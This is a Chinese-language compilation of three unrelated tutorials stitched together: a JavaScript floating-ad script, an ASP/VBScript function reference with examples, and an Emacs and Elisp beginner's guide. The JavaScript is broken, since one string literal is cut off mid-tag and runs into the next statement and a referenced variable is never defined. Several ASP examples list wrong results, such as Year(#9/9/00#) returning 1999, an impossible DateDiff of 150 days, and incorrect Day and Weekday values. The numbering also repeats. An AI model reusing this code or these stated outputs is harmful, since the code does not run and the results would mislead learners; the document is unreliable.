var showad = true;

var Toppx = 60;   //上端位置

var AdDivW = 100;  //宽度

var AdDivH = 360;  //高度

var PageWidth = 800; //页面多少宽度象素下正好不出现左右滚动条

var MinScreenW = 1024; //显示广告的最小屏幕宽度象素

var ClosebuttonHtml = '<div align="right" style="position: absolute;top:0px;right:0px;margin:2px;padding:2px;z-index:2000;"><a href="javascript:;" onclick="hidead()" style="color:#000000;text-decoration:none;font-size:12px;">关闭</a></div>'

var AdContentHtml = '<div align="center" style="color:green;font-size:23pt;font-family:黑体;"><a href="document.write ('<div id="Javascript.LeftDiv" style="position: absolute;border: 1px solid #336699;background-color:#EEEEE2;z-index:1000;width:'+AdDivW+'px;height:'+AdDivH+'px;top:-1000px;word-break:break-all;display:none;">'+ClosebuttonHtml+'<div>'+AdContentHtml+'</div></div>');

document.write ('<div id="Javascript.RightDiv" style="position: absolute;border: 1px solid #336699;background-color:#EEEEE2;z-index:1000;width:'+AdDivW+'px;height:'+AdDivH+'px;top:-1000px;word-break:break-all;display:none;">'+ClosebuttonHtml+'<div>'+AdContentHtml1+'</div></div>');

function scall(){

 if(!showad){return;}

 if (window.screen.width<MinScreenW){

  alert("临时提示：\n\n显示器分辨率宽度小于"+MinScreenW+",不显示广告");

  showad = false;

  document.getElementById("Javascript.LeftDiv").style.display="none";

  document.getElementById("Javascript.RightDiv").style.display="none";

  return;

 }

 var Borderpx = ((window.screen.width-PageWidth)/2-AdDivW)/2;

 document.getElementById("Javascript.LeftDiv").style.display="";

 document.getElementById("Javascript.LeftDiv").style.top=document.body.scrollTop+Toppx;

 document.getElementById("Javascript.LeftDiv").style.left=document.body.scrollLeft+Borderpx;

 document.getElementById("Javascript.RightDiv").style.display="";

 document.getElementById("Javascript.RightDiv").style.top=document.body.scrollTop+Toppx;

 document.getElementById("Javascript.RightDiv").style.left=document.body.scrollLeft+document.body.clientWidth-document.getElementById("Javascript.RightDiv").offsetWidth-Borderpx;

}

function hidead()

{

 showad = false;

 document.getElementById("Javascript.LeftDiv").style.display="none";

 document.getElementById("Javascript.RightDiv").style.display="none";

}

window.onscroll=scall;

window.onresize=scall;

window.onload=scall;

保存成duilian.js文件,然后用<script src="duilian.js"> </script>就可以用咯..

1.ucase()函数，这个函数里面包裹了一些能把大写变成小写的代码。
<%
a="this is fif studios!"
b=ucase(a)
response.write(a)
response.write("<br/>")
response.write(b)
%>

结果：
this is fif studios!
THIS IS FIF STUDIOS!
2.Sqr() 函数，会立即返回数的平方根
3.Date()函数，会返回当前系统的日期
4.Abs()函数，返回数字的绝对值
5.Sin()函数，返回某个角的正弦值
6.now()函数，获取现在的时间
<%
a=now()
response(a)
%>

结果：
2007-10-29 22:16:23
5.FormDateTime(Date[，NamedFormat])函数，格式化时间
Date 必选，要被格式化的日期表达式。
NamedFormat 可选，指示所使用的日期/时间格式的数值，如果省略，则使用vbGeneralDate。

6.Array()函数返回一个数组
表达式 Array(list)
允许数据类型: 字符，数字均可
实例：
<%
Dim myArray()
For i = 1 to 7
Redim Preserve myArray(i)
myArray(i) = WeekdayName(i)
Next
%>
返回结果: 建立了一个包含7个元素的数组myArray
myArray("Sunday","Monday", ... ... "Saturday")
7.CInt() 函数将一个表达式转化为数字类型
表达式 CInt(expression)
允许数据类型: 任何有效的字符均可
实例：
<%
f = "234"
response.write cINT(f) + 2
%>
返回结果: 236
转化字符"234"为数字"234"，如果字符串为空，则返回0值
8.CreateObject() 函数建立和返回一个已注册的ACTIVEX组件的实例。
表达式 CreateObject(objName)
允许数据类型: objName 是任何一个有效、已注册的ACTIVEX组件的名字.
实例： <%
Set con = Server.CreateObject("ADODB.Connection")
%>
9.CStr() 函数转化一个表达式为字符串.
表达式 CStr(expression)
允许数据类型: expression 是任何有效的表达式。
实例： <%
s = 3 + 2
response.write "The 返回结果 is: " & cStr(s)
%>
返回结果: 转化数字“5”为字符“5”。
10.Date()
函数返回当前系统日期.
表达式 Date()
允许数据类型: None.
实例： <%=Date%>
返回结果: 9/9/00
11.DateAdd()函数返回一个被改变了的日期。
表达式 DateAdd(timeinterval,number,date)
允许数据类型:
timeinterval is the time interval to add;
number is amount of time intervals to add;
and date is the starting date.
实例： <%
currentDate = #9/9/00#
newDate = DateAdd("m",3,currentDate)
response.write newDate
%>
<%
currentDate = #12:34:45 PM#
newDate = DateAdd("h",3,currentDate)
response.write newDate
%>
返回结果: 9/9/00
3:34:45 PM
"m" = "month";
"d" = "day";
If currentDate is in time format then,
"h" = "hour";
"s" = "second";
12.DateDiff()
函数返回两个日期之间的差值 。
表达式 DateDiff(timeinterval,date1,date2 [, firstdayofweek [, firstweekofyear]])
允许数据类型: timeinterval 表示相隔时间的类型，如“M“表示“月”。
实例： <%
fromDate = #9/9/00#
toDate = #1/1/2000#
response.write "There are " & _
DateDiff("d",fromDate,toDate) & _
" days to millenium from 9/9/00."
%>
返回结果: 从9/9/00 到2000年还有 150 天.
13.Day()函数返回一个月的第几日 .
表达式 Day(date)
允许数据类型: date 是任何有效的日期。
实例： <%=Day(#9/9/00#)%>
返回结果: 4
14.FormatCurrency()函数返回表达式，此表达式已被格式化为货币值
表达式 FormatCurrency(Expression [, Digit [, LeadingDigit [, Paren [, GroupDigit]]]])
允许数据类型: Digit 指示小数点右侧显示位数的数值。默认值为 -1，指示使用的是计算机的区域设置; LeadingDigit 三态常数，指示是否显示小数值小数点前面的零。
实例： <%=FormatCurrency(34.3456)%>
返回结果: $34.35
15.FormatDateTime()函数返回表达式，此表达式已被格式化为日期或时间
表达式 FormatDateTime(Date, [, NamedFormat])
允许数据类型: NamedFormat 指示所使用的日期/时间格式的数值，如果省略，则使用 vbGeneralDate.
实例： <%=FormatDateTime("09/9/00", vbLongDate)%>
返回结果: Sunday, September 09, 2000
16.FormatNumber() 函数返回表达式，此表达式已被格式化为数值.
表达式 FormatNumber(Expression [, Digit [, LeadingDigit [, Paren [, GroupDigit]]]])
允许数据类型: Digit 指示小数点右侧显示位数的数值。默认值为 -1，指示使用的是计算机的区域设置。; LeadingDigit i指示小数点右侧显示位数的数值。默认值为 -1，指示使用的是计算机的区域设置。; Paren 指示小数点右侧显示位数的数值。默认值为 -1，指示使用的是计算机的区域设置。; GroupDigit i指示小数点右侧显示位数的数值。默认值为 -1，指示使用的是计算机的区域设置。.
实例： <%=FormatNumber(45.324567, 3)%>
返回结果: 45.325
17.FormatPercent() 函数返回表达式，此表达式已被格式化为尾随有 % 符号的百分比（乘以 100 ）。 (%)
表达式 FormatPercent(Expression [, Digit [, LeadingDigit [, Paren [, GroupDigit]]]])
允许数据类型: 同上.
实例： <%=FormatPercent(0.45267, 3)%>
返回结果: 45.267%
Hour() 函数以24时返回小时数.
表达式 Hour(time)
允许数据类型:
实例： <%=Hour(#4:45:34 PM#)%>
返回结果: 16
(Hour has been converted to 24-hour system)
18Instr() 函数返回字符或字符串在另一个字符串中第一次出现的位置.
表达式 Instr([start, ] strToBeSearched, strSearchFor [, compare])
允许数据类型: Start为搜索的起始值，strToBeSearched接受搜索的字符串 strSearchFor要搜索的字符.compare比较方式（详细见ASP常数）
实例： <%
strText = "This is a test!!"
pos = Instr(strText, "a")
response.write pos
%>
返回结果: 9
19.InstrRev()函数同上，只是从字符串的最后一个搜索起
表达式 InstrRev([start, ] strToBeSearched, strSearchFor [, compare])
允许数据类型: 同上.
实例： <%
strText = "This is a test!!"
pos = InstrRev(strText, "s")
response.write pos
%>
返回结果: 13
20.Int() 函数返回数值类型,不四舍五入。
表达式 Int(number)
允许数据类型:
实例： <%=INT(32.89)%>
返回结果: 32
21.IsArray()函数判断一对象是否为数组，返回布尔值 .
表达式 IsArray(name)
实例： <%
strTest = "Test!"
response.write IsArray(strTest)
%>
返回结果: False
22.IsDate()函数判断一对象是否为日期，返回布尔值
表达式 IsDate(expression)
实例： <%
strTest = "9/4/2000"
response.write IsDate(strTest)
%>
返回结果: True
23.IsEmpty()函数判断一对象是否初始化，返回布尔值.
表达式 IsEmpty(expression)
实例： <%
Dim i
response.write IsEmpty(i)
%>
返回结果: True
24.IsNull() 函数判断一对象是否为空，返回布尔值.
表达式 IsNull(expression)
实例： <%
Dim i
response.write IsNull(i)
%>
返回结果: False
25.IsNumeric()函数判断一对象是否为数字，返回布尔值.
表达式 IsNumeric(expression)
实例： <%
i = "345"
response.write IsNumeric(i)
%>
返回结果: True
就算数字加了引号，ASP还是认为它是数字。
26.IsObject()函数判断一对象是否为对象，返回布尔值.
表达式 IsObject(expression)
实例： <%
Set con = Server.CreateObject("ADODB.Connection")
response.write IsObject(con)
%>
返回结果: True
27.LBound() 函数返回指定数组维的最小可用下标.
表达式 Lbound(arrayname [, dimension])
实例： <%
i = Array("Monday","Tuesday","Wednesday")
response.write LBound(i)
%>
返回结果: 0

28.LCase()函数 返回字符串的小写形式
表达式 Lcase(string)
实例： <%
strTest = "This is a test!"
response.write LCase(strTest)
%>
返回结果: this is a test!
29.Left()函数返回字符串左边第length个字符以前的字符（含第length个字符).
表达式 Left(string, length)
实例： <%
strTest = "This is a test!"
response.write Left(strTest, 3)
%>
返回结果: Thi
30.Len()函数返回字符串的长度.
表达式 Len(string | varName)
实例： <%
strTest = "This is a test!"
response.write Len(strTest)
%>
返回结果: 15
31.LTrim()函数去掉字符串左边的空格.
表达式 LTrim(string)
实例： <%
strTest = " This is a test!"
response.write LTrim(strTest)
%>
返回结果: This is a test!
32.Mid()函数返回特定长度的字符串(从start开始,长度为length).
表达式 Mid(string, start [, length])
实例： <%
strTest = "This is a test! Today is Monday."
response.write Mid(strTest, 17, 5)
%>
返回结果: Today
33.Minute()函数返回时间的分钟.
表达式 Minute(time)
实例： <%=Minute(#12:45:32 PM#)%>
返回结果: 45
34.Month()函数返回日期.
表达式 Month(date)
实例： <%=Month(#08/04/99#)%>
返回结果: 8
35.MonthName()函数返回指定月份
表达式 MonthName(month, [, Abb])
实例： <%=MonthName(Month(#08/04/99#))%>
返回结果: August
36.Now()函数返回系统时间
表达式 Now()
实例： <%=Now%>
返回结果: 9/9/00 9:30:16 AM
37.Right()函数返回字符串右边第length个字符以前的字符（含第length个字符).
表达式 Right(string, length)
实例： <%
strTest = "This is an test!"
response.write Right(strTest, 3)
%>
返回结果: st!
38.Rnd()函数产生一个随机数.
表达式 Rnd [ (number) ]
实例： <%
Randomize()
response.write RND()
%>
返回结果: 任何一个在0 到 1 之间的数
39.Round()函数返回按指定位数进行四舍五入的数值.
表达式 Round(expression [, numRight])
实例： <%
i = 32.45678
response.write Round(i)
%>
返回结果: 32
40.Rtrim()函数去掉字符串右边的字符串.
表达式 Rtrim(string)
实例： <%
strTest = "This is a test!! "
response.write RTrim(strTest)
%>
返回结果: This is a test!!
41.Split()函数将一个字符串分割并返回分割结果
表达式 Split (S[，d])
实例：<%V= Split(A,B,C)
For i = 0 To UBound(V)
Response.Write V(i)
Next
%>
返回结果: A B C
42.Second()函数返回秒.
表达式 Second(time)
实例： <%=Second(#12:34:28 PM#)%>
返回结果: 28
43.StrReverse()函数反排一字符串
表达式 StrReverse(string)
实例： <%
strTest = "This is a test!!"
response.write StrReverse(strTest)
%>
返回结果: !!tset a si sihT
44.Time()函数返回系统时间.
表达式 Time()
实例： <%=Time%>
返回结果: 9:58:28 AM
45.Trim()函数去掉字符串左右的空格.
表达式 Trim(string)
实例： <%
strTest = " This is a test!! "
response.write Trim(strTest)
%>
返回结果: This is a test!!
46.UBound()函数返回指定数组维数的最大可用下标>.
表达式 Ubound(arrayname [, dimension])
实例： <%
i = Array("Monday","Tuesday","Wednesday")
response.write UBound(i)
%>
返回结果: 2
47.UCase()
函数返回字符串的大写形式.
表达式 UCase(string)
允许数据类型:
实例： <%
strTest = "This is a test!!"
response.write UCase(strTest)
%>
返回结果: THIS IS A TEST!!
48.VarType()函数返回指示变量子类型的值
表达式 VarType(varName)
实例： <%
i = 3
response.write varType(i)
%>
返回结果: 2(数字)详见"asp常数"
49.WeekDay()函数返回在一周的第几天.
表达式 WeekDay(date [, firstdayofweek])
实例： <%
d = #9/9/00#
response.write Weekday(d)
%>
返回结果: 4(星期三)
50.WeekDayName()函数返回一周第几天的名字.
表达式 WeekDayName(weekday [, Abb [, firstdayofweek]])
实例： <%
d = #9/9/00#
response.write WeekdayName(Weekday(d))
%>
返回结果: Wednesday
51.Year()函数返回当前的年份.
表达式 Year(date)
实例： <%=Year(#9/9/00#)%>
返回结果: 1999

Emacs 启动:

直接打emacs, 如果有X-windows就会开视窗. 如果不想用X 的版本,

就用 emacs -nw       (No windows)起动.

符号说明

C-X 表示按住CTRL键, 然後按X, 再把CTRL, X一起放开.

M-X          META                  META

在没有META键的电脑上, M-X 等於先按 ESC键, 接著按 X键.

Sun上面META键就是菱形的那个键.

有些系统META键就是ALT键.(或者某一边的ALT键)

C-X或 M-X的X没有大小写分别.

Emacs按键命令基本上是一串C-<chr>和M-<chr>组成的.

超过两个以上的按键命令, Emacs会在萤幕最下面一行显示你按过什麽.

这一行叫作mini buffer

结束Emacs按 C-x C-c

取消执行 C-g

有些Emacs命令会跑很久, 可以用C-g中断之. 按错键也可以按C-g取消.

上下移动    C-p 向上 (previous line) C-n向下(next line)

左右移动    C-f 向右 (forward) C-b 向左 (backward)

    其实Emacs内部没有行的概念, 把一篇文章放在一个大buffer

    里面, 所以C-f (forward)就是向档尾移动, C-b (backward)

    是移回去的意思, 一次一个字.

翻页   下一页 C-v (view next screen)

       上一页 M-v  

    翻页时,上一页末尾会留一点在萤幕最上面,以维持连续性.  

Emacs在游标接近萤幕最下方时会自动跳半页, 把档案往前挪一点,

方便阅读.

重画萤幕 C-L

Emacs里面游标的专有名词叫point. point == 游标目前的 点

游标一次跳一个字(word) M-f   往後跳 M-b

   注意 C-f 与 M-f, C-b 与 M-b的对称性.

移到行头 C-a   行尾 C-e

移到句首 M-a   到句尾 M-e

   (M-a 到上一个句点後面,一个句子的起头.

    M-e 到句点後面)

移到档头 M-< 档尾 M->

删除游标目前指的/後面的字 C-d

         前面的字 DEL   (Delete键)

DEL的正名叫Rubout (Rub out)

M-DEL 往回删一个字(word)

M-d    往前删 (游标後面)

C-k    删至行尾 (kill)

M-k    删到一句子结尾(删到句点) (kill)

注意Backspace = C-h 在Emacs下是help的意思

後面有(kill)的, 表示此删除的动作是kill, 不太等於delete.

emacs会把kill掉的东西放到kill ring去, 算是一种暂存的地方,

以後可以叫出来.见 yank说明.

Undo: C-x u

C-_ 等於 C-x u     有些DEC终端机, C-/就是C-_

                   有时等於C-Shift- -

重复执行

举例, 向右移 8个字, C-u 8 C-f

C-u 在Emacs里是蛮特别的,用来设定一些引数(argument/repeat count)

给其後的命令.

C-u 2 0 C-n 向下移 20行

有一个特别的例外, C-u 3 C-v 不是翻三页, 而是整个萤幕向上移三行.

据说这比较有意义.

C-u 1 0 C-x u    UNDO 10次

给C-L一个引数会怎麽样:

C-u 0 C-l 会重画萤幕,并且把目前的行移到萤幕第一行.

另外, C-u 100    等於 M-100

       C-u 数字   等於 M-数字

X windows 下,  

C-left C-right 一次移一个字(word).

C-up C-down 移动一段 (paragraphs/C语言的话是block)

Home = C-a

End = C-e

C-Home = M-<

C-end = M->

PgUp PgDn = M-v C-v

设定重覆次数更加简单,

比如要向右移10个字 C-1 C-0 right-arrow

   就是按住CTRL, 然後打10就对了, 比 C-u 1 0 简单.

Mouse中键用来选取有hi-light的地方.

      右键是menu-button

如果不小心按两次ESC, 等於 M-ESC,   会有一个讯息跑出来

说你按到一个被disable的命令. 这是高级指令, 作者认为

初学者用不道,所以会问你要不要启动它, 一般回答no.

如果某一行太长, 萤幕显示不下, Emacs会在萤幕最右边打个$,

表示此行未完,右边还有.

把一行拆成两行: 在想拆处按Enter即可.

合并两行为一行: 在行尾按C-d (或行首按DEL)

Yank: 吐出被删掉的(killed)东西.

只要用kill (C-k, M-k等) 删除, 超过一个字的资料,

emacs就会把它存起来, 然後C-y 可以把它叫出来.

功能跟Cut & Paste一样. Kill 和delete不一样, 只有被

kill掉的东西才能用yank吐回来.

游标在同一地方不动, 连续kill掉的资料会被当成一次kill掉的,

yank时会一起回来.

被Kill掉的资料是放在称作 kill ring的资料结构上面, ring就是个圆圈,

被kill掉的东西会依序摆在圆圈上. yank 会放回最近一次kill掉的资料.

如果不是你想要的话, 用M-y 可以换.   (M-y就是告诉emacs, 不对不对,

我不是要这一个,换前一个给我).

M-y 要紧接在C-y之後.

拷贝文字的方法== 连续 C-k 几次,   把要拷贝的行全部删掉,

然後按 C-y 弄回来. 再到想复制的地方按一次C-y, 就成了.

把要拷贝的资料kill掉在yank回来好像很笨. 是有比较文明的

方法, 那就是M-w, 不过较麻烦.

首先,要先设标记. Mark 用 C-SPC 或 C-@ 设. 然候

把游标移到另一端, 按 M-w 就可以把 mark 到 point间的

字存到kill ring上. point 就是游标的意思.

Emacs不会把Mark起来的地方用highlight表示, 除非在X下.

在X下, 可以用M-w 来拷贝用滑鼠反白的文字.

kill & yank 就是 cut & paste的意思.

以上大部份指令对Bash的命令列编辑也有效

档案操作

读档: Emacs术语叫 finding a file.

C-x C-f 然後在mini-buffer输入档名. 输入档名时, SPC键有

auto-complete的功能,或者会秀出到目前为止档名前几

个字和输入一样的. (TAB键也有类似功能)

C-x C-f 叫 find-file

C-x C-s 存档 (save current file, save current buffer)

C-x s    存所有的档

C-x i    插入档案   把另外的档案的内容读入目前编辑区内

视窗

Emacs把档案读进来,存在buffer中.

我们透过window来看/编辑buffer.

两个视窗会把萤幕切成两部份, 他们可以同时显示

相同的, 或不同的档案.

对初学者而言, 最需要的是记住怎样让不想要的视窗消失:

C-x 0 关掉目前的视窗

C-x 1 会让目前的视窗占满整个萤幕 (One Window),

       取消/关掉其他的视窗.

Emacs里面有许多功能都会开一个小视窗来和使用者沟通, 显示讯息.

有时候不会自动消失很讨厌, C-x 1 就很有用.

另一个功能是如何跳到另一个视窗.

C-x o   (other-window)

C-x 2 把目前的视窗切成两个 (水平分割)

C-x 3                       (垂直分割)

C-x 4 是一串与视窗有关的指令.

C-x 4 是一串与视窗有关的指令.

C-x 5 则是扩展到X的视窗, 称为frame.

       C-x 5 2 就是再开另一个X视窗 (frame).

多档编辑

C-x C-b 看目前有那些buffer (buffer就是emacs放开起的档案的地方).

C-x b 然後在minibuffer输入buffer的名字,可以切换编辑buffer.

       TAB键也有作用. 有些内部的buffer (就是没有档案的buffer),

       是用*开头和结束, 这个也要打, 如*scratch*

最候提醒:

   C-x 1 可以把多馀的视窗关掉.

Emacs扩充指令

前面介绍的emacs按键大部份都是C-<chr> 或者 M-<chr>的形式.

这是最简单的按法, 由一对按键构成一个指令.

Emacs的按键可以超过2个以上. 如 C-x 1 或 C-x C-b.

一般超过一个按键组合的命令都是用C-x 开头.

另外你也可以直接下命令. 按 M-x 之後就可以打一个Emacs命

令来执行. 一般这些命令名字都很长, 不过都不常用. 等一下

我们会介绍一些. 还有介绍怎麽把这些命令设成按键指令.

C-x C-c 就是结束Emacs. 不过一般Emacs很笨重, 一旦起动就不轻易

退出. 所以比较常用的是C-z

C-z 把Emacs暂停, 回到命令列. 当你下次再需要编辑时,打fg %emacs

就可以把Emacs唤醒.

在X下, C-z会把emacs缩成icon

mode line

emacs编辑画面由 编辑区(buffer) 状态列 (modeline) 和对话区 (minibuffer)

构成. 这里解释 modeline 显示的讯息.

以下是个范例:

    --**-XEmacs: xemacs.qs       (Fundamental)----74%-------

由後面往前解释, 74% 表示游标的位置.

(Fundamental)表示编辑模式.这是最原始的模式. 编辑不同种类的文章

可能希望用不同的模式, 比如说C-mode, lisp-mode, tex-mode, text-mode

等等. 在不同模式下可能多一些按键出来. 举例text-mode.

       M-x text-mode

可以切入text-mode, 这是一般人编辑文字使用的模式. 和Fundamental mode

没什麽差异. 不过游标移动时, Emacs对一个字的定义就有所不同, 因而

M-f M-b 等移动一个字, 一个段落的指令就可能会停在标点符号的前面.

此时状态列变为... (Text)----70%---

以上说的是Major mode. 另外还有minor mode, 其实就是一些额外的功能.

比如说, M-x auto-fill-mode 则状态列显示 (Text Fill).

auto-fill就是自动断行, 让文章每行固定有70个字.

M-X fundamental-mode 可以变回来.

这里要说明一下, emacs在 minibuffer下有auto-completion的功能,

也就是打M-x fund 然後按 SPC, 它会自动补全 fundamental-mode,

不用全打. 如果有两个以上的选择, 它会告诉你. 这个功能对

find-file (C-x C-f)等等档案编辑功能也有效. 前面提过.

最後解释两个**号. 右边的*表示文章被修改过了.

左边的* 表示这个编辑区(buffer)可以修改.

有一些emacs的buffer是read-only buffer, 就会标成%

%%表示档案是read-only.

C-x C-q 可以解开read-only的锁定, 无论如何你要改这个编辑区.

这是个toggle指令, 如果原来是可以修改的, C-x C-q会把它切成

read-only.

Search

没有Search 功能的编辑器简直就是小朋友的玩具. Search

是一项很重要的功能, 所以emacs也提供的很完善.

C-s

C-r

M-x re-search-forward

M-x re-search-backward

M-x search-forward

M-x search-backward

以上这些指令是基本的search指令. C-s, C-r是increamental search,

就是你打字的同时, emacs就直接帮你找. 一个是forward, 一个是backward.

找到了怎麽办? 按C-g可以取消搜寻, 跳回原来的位置. 按Enter就让游标

停在找到的地方 -- 此时minibuffer显示:Mark saved where search started

什麽意思? 就是isearch帮你在原来的位置设了一个mark, 然後把point

(cursor) 移到新的位置.

想跳回去原先的地方?

C-x C-x 就可以了.(exchange-point-and-mark)

C-u C-SPC 可以依序跳回前几次设mark的地方.

   (C-SPC是设mark, 给它一个argument, 就是反动作)

   (还记不记得C-u 可以给後面的指令设一些参数.

    有些指令拿这个参数来当作repeat count,

    有些指令就只拿来当作on/off, true/false, set/clear而已)

M-x re-search-forward可以让你用regular expression搜寻.

M-x search-forward则没有increamental的功能.

另外一个指令, 作用和grep很像:

M-x occure

和search相提并论的就是replace.

M-x replace 然後按 SPC, 就知道了.

Emacs的设定:

Emacs的设定档是 $HOME/.emacs

你应该多少知道, emacs是用lisp写成的编辑器, .emacs档也都是

要用lisp的语法设定. emacs用的lisp称为elisp, 和一般的lisp差一点点.

有一个info page, emacs-lisp-intro, 深入浅出的介绍emacs lisp.

如果你还不会, 不懂programming, 强烈建议你看这份文件. 如果你

会texinfo, 你可以把它很漂亮的印出来. (内容一点点而已, 两三

天就看完了)

如果你把.emacs搞砸了, 进emacs很奇怪, 怎麽办?

1. 用 vi 改 .emacs :>

2. emacs -q 进 emacs

Major Modes

一般常见的emacs major mode有

   fundamental-mode

     text-mode

     lisp-mode    有自动对括号/重排, 直接执行lisp code功能.

     c-mode/cc-mode c-mode是比较旧的c-mode, cc-mode应该是

                 目前新的c-mode. 有自动重排/对括号的功能.

                 也可以在emacs内compile, 跳到compiler error

                 修正错误. 执行程式时debug. (配合dbx/gdb)

                 compile是透过Makefile进行.

     tex-mode     Tex/Latex编辑模示. 可能是打一些奇怪的标点

                 符号比较方便.

     <programming-language>-mode

                 同lisp/cc-mode. 如果是interpreter的话,

                 emacs通常都可以直接执行/debug.

     <programming-language>-mode还有tags的功能, 後述.

     html-mode, texinfo-mode, sgml-mode: 编写html, texi, sgml之用.

     w3-mode      WWW browser. 在x-win上不满意,但可以接受...

Tags

Tags 是一个显为人知的功能? 所以我想提一下. 这不是emacs发明的,

而是vi 原本的特异功能. emacs只是发扬光大而已.

假设你有一个目录, 里面是一个程式的原始码, 比如说, tin 的原始码,

放在 ~/tin-1.3beta 下面. 你想看它们.

首先, 叫emacs cd到该目录:

     M-x cd

然後, 建立tag table.

tag table 就是一张对照表, 记录哪个符号(variable/function call)

对映到哪个档案的哪个地方. 有这张表, emacs可以让我们快速的在程

式码内游走. 一般这张表是一个档案, 叫作TAGS (大写)

    M-! etags *.[ch]

M-! 是执行external shell command的意思. etags就是emacs的建表程式.

你只要告诉它你的source code在那□即可.

vi的话是使用ctags这个程式, 它建出来的档名叫tags (小写). 因为

我们介绍emacs, 所以不管它.

然後, 怎麽看程式? 你知道所有的C 程式都是由main()开始, 所以你想

找到main()在哪个档案. 这时只要按   M-. 然後emacs会问你tag table

在哪里. 因为我们已经cd到该目录, 直接按enter就好了. 然後输入main,

emacs就会把你带到main(){ ... }去.

如果 你看到某个程式片断呼叫一个你没看过的函式, 你可以把游标

移到该函式的名字上, M-. ENTER 就搞定了.

如果 emacs找错了 (比如有变数和函式同名, emacs跳到变数去),

那你可以用 C-u M-. 找下一个.

在编辑程式码的时候, M-SPC 很有用, 它会把游标附近的空白缩成一个.

在其它地方也有效.

Emacs的一些package:

M-x dired   (或C-x d)

           游走/编辑 目录, 就是档案总管的意思 :)

M-x man    就是man page

M-x shell 开个command prompt, 不过不能跑vi,elm, tin...

M-x gnus   读新闻/读信

M-x rmail 读信

M-x vm     view mail

M-x mh-rmail 读信 (package mh-e)

M-x mh-smail 送信 (package mh-e)

强列建议改用emacs读news/bbs. 世界会更美好!

读信的话就要看你的感觉. 这些读信程式都会把信从系统的mail folder

搬到自己的目录下, 占用quota, 我不喜欢 :p 建议elm或mutt.

除非参加mailling list配合procmail. 不然不实用.

用mh-e 须要装mh 这个外部程式, 不太好. 建议vm 或 gnus.

写完信, C-c C-c 就可以送信.

如果你的资料用rcs/sccs作版本管理, emacs自动会起动version control

(minor mode.), c-x c-q 变成check-in/check-out.

如何取得更多的资讯:

Emacs的lisp 经过多年的发展,已成为完整的self-documenting系统.

很多东西都可以线上找到你要的资讯.

前面说过,或者你已经不小心按backspace遇到了, C-h (就是backspace

的ascii码) 在emacs里面是help的意思, 它可以带出一串指令.

常用的有:

    C-h F    Emacs FAQ  

    C-h t    Emacs 使用教学

    C-h n    Emacs NEWS file, 介绍最近改版的新功能

    C-h i    Info system. Info是gnu用来取代man page的系统,

            基本上和文字模示的WWW差不多. 有许多重要的资讯

            可以在这边找到. 如果你是新手, 建议你在x-win下

            看. 不然, 按键 m (menuitem), SPC next page

            l (last node: node就是章节的意思) u (up node)

            d (directory, 索引). BS (Backspace, back a page).

            如果全部只按SPC, 就跟man 一样.

    C-h k    describe key, 告诉你按这个键执行那个lisp function.

    C-h f    describe function. 告诉你function在作什麽.

            如果只按SPC, emacs会给你所有lisp 函数的列表, 和说明.

    C-h v    describe variable 同function.

    C-h a    apropos的意思(approximate).   给lisp function的部份

            字串, emacs帮你找.

    C-h b    列出目前所有的keybinding

    C-h m    mode help. 列出目前的mode的特殊说明.

    C-c C-h 列出以C-c 开头的所有key-binding. 虽然说Emacs

            可以定义按键, 可是Ctrl- 开头的所有组合大概都用光了,

           只有C-c算是可以自定指令. 不过有些mode也侵犯这个空间.

            目前的convention是C-c <chr> 留给user, C-c C-<chr>

            留给package.

有以上这些help, 你的emacs/elisp功力会随著时间成长.

Elisp 简介:

Emacs有三份手册.第一份是使用手册, 第二份是Elisp 手册, 第三份是

Elisp 简介.   第三份的程度是入门级, 值得看. Elisp手册其实也写的

很简单, 还教你lisp, 不过有点长, 适合参考.

因为我lisp没有仔细学过, 所以:

以下所言, 如有巧合, 那才是真的.

Basic data type

   字串 (string) "Hello, World"

   字元 (char)   ?a                ; 问号开头

   atom & list:

      (1 2 3 4)   是一个list, 由 4个 atom 组成.

   pair:   中间是句点.

      (apple . 2)     

alist (associated list)

      就是一堆 pair的集合,就像perl/tcl的associative array.

      或者说是一个资料库, 一堆 (key, value) pair.

      '((Apple      . 1)

        (Orange     . 2)

        (PineApple . 3))

   vector (?)

      emacs 19用vector 来表示按键(key strok sequence)

      [f1] [f2] [f1 a]

   nil   就是空的list, 或者表示 false

   t     true

Forms

   我们写程式最好有样版让我们填空最简单了.

   Form 就是样版, 不过意义不太一样.

   Form 就是Elisp 可以接受的句型.

   lisp 解译器 预设是对list的每个元素求值(evaluate),

   除非是 special form, 有特殊的定义. 比如说

   (defun FUNC (ARG-LIST)

       BODY ...)

就是一个special form, 用来定义函式, 所以FUNC 不会被

   求值, 被当成symbol, ...

   (quote (LIST))

   这也是个special form, 叫 lisp 把 (LIST)当做symbol就好了,

   不要 evaluate.

   quote 很常用, 所以有个缩写:

   '(LIST)   等於 (quote (LIST))

   'Asymbol 可以表示一个Atom, 名称叫Asymbol

   set 可以产生/定义新的变数.

   (set 'hello 1)

   ; hello = 1   

   ; 注意我们用 'hello, 所以lisp不会evaluate hello的值.

   这家伙很常用, 也有简写.

   (setq hello 1)

   setq 就是set quote 的缩写. 这是个 special form, 不会对

   第二个元素求值.

valuation

在Emacs下, C-x C-e 可以执行(evaluate, 求值)游标左边的叙述.

结果会出现在minibuffer.

lisp-interaction-mode中 C-j 可以evaluate, 并且把结果append到 buffer.

lisp 程式由一堆list 构成.称为expression.

每个expression 都回传回一个值.

有些expression有副作用, 如删掉一个字.

   (这跟C 的int delete_char() 意思一样, 它传回int,

    并且删掉某个char)

定义函式:

(defun NAME (ARGS-LIST)

       "注解"                   ; optional

       (interactive)            ; optional

       BODY)

定义一个叫NAME的函式. BODY 是一堆expression.

注解是用来给C-h f显示的.

(interactive) 表示这个函示会和user/buffer作用.

(interactive "B") 表示执行此函式先问user一个buffer的名字,

               然後当作参数传给它. (如, 当user透过key-binding

               或者 M-x 呼叫此函式时)

(interactive "BAppend to buffer: \nr")

              问user buffer name时, 提示号 Append to buffer:

              此function有两个引数,第一个是B, 就是buffer

              第二个是r, region

              用\n 隔开.

(interactive "p") 用C-u 设的prefix 把它当作参数传给我.

                   预设值==4. C-u C-f 向右移四个字

一些lisp 函式:

(list 1 2 3 4)    产生 '(1 2 3 4)

(car '(1 2 3 4)        1

(cdr '(1 2 3 4)        '(2 3 4)

(cons 1 '(2 3 4))      '(1 2 3 4)

(cons 1 2)             (1 . 2)

(cons 0 (cons 1   (cons 2 nil)))

                 等於   '(0 1 2)

       {list 是用 pair 串起来的,

        用C 表示:

            pair: {Object *first, Object *second};

            *(pair[i].first) == i;

            pair[i].second == pair[i+1]; }

(cons '(1 2) '(3 4))   '((1 2) 3 4)

(setq a 1)

